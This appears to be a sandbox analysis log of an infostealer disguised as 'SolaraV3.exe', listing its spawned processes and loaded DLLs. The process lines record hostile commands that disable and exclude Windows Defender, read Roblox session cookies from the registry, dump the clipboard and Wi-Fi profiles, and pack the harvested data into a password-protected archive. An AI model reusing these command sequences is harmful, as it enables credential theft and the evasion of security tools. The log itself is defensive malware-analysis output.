Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: python3.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: libffi-7.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: sqlite3.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: libcrypto-1_1.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: libssl-1_1.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: dciman32.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: mmdevapi.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: devobj.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: ksuser.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: avrt.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: audioses.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: msacm32.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: midimap.dll
Source: C:\Users\user\Desktop\SolaraV3.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
